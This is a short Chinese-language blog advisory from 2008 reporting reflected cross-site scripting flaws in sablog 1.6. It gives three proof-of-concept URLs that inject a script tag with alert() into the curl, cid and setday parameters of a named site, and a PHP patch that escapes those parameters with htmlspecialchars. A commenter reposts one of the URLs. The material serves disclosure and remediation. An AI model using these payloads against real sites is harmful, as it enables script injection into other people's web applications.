sablog 1.6 多个跨站漏洞

Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.luoq.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.luoq.net/?action=index&cid=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.luoq.net/?action=index&setdate=200804&setday=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>&page=1

临时解决办法:

在global.php中过滤curl,cid,setday等

  1. $modelink = '';  
  2. if ($action) {  
  3.     $modelink .= '&action='.$action;  
  4. }  
  5. if ($curl) {  
  6.     $modelink .= '&curl='.htmlspecialchars($curl);  
  7. }  
  8. if ($cid) {  
  9.     $modelink .= '&cid='.htmlspecialchars($cid);  
  10. }  
  11. if ($setdate) {  
  12.     $modelink .= '&setdate='.htmlspecialchars($setdate);  
  13. }  
  14. if ($setday) {  
  15.     $modelink .= '&setday='.htmlspecialchars($setday);  
  16. }  
  17. if (intval($_GET['searchid'])) {  
  18.     $modelink .= '&searchid='.htmlspecialchars($_GET['searchid']);  
  19. }  
  20. if (intval($_GET['userid'])) {  
  21.     $modelink .= "&userid=".htmlspecialchars($_GET['userid']);  
  22. }  
  23. if ($_GET['item']) {  
  24.     $item = urlencode(addslashes($item));  
  25.     $modelink .= '&item='.$item;  
  26. }

关键词: bug , xss , 原创 , sablog , 漏洞

上一篇: 让putty支持中文输入和显示
下一篇: SaGunman

相关文章
访客评论
#1
回复 asd 2008-03-31, 23:20:18
http://www.luoq.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
#2
回复 m 2008-04-20, 16:54:28
请问这是sablog 1.6还是sablog X 1.6?
#3
回复 Gowiththewind 2008-12-02, 14:31:17
<?php
echo adasd;
?>
发表评论

评论内容 (必填):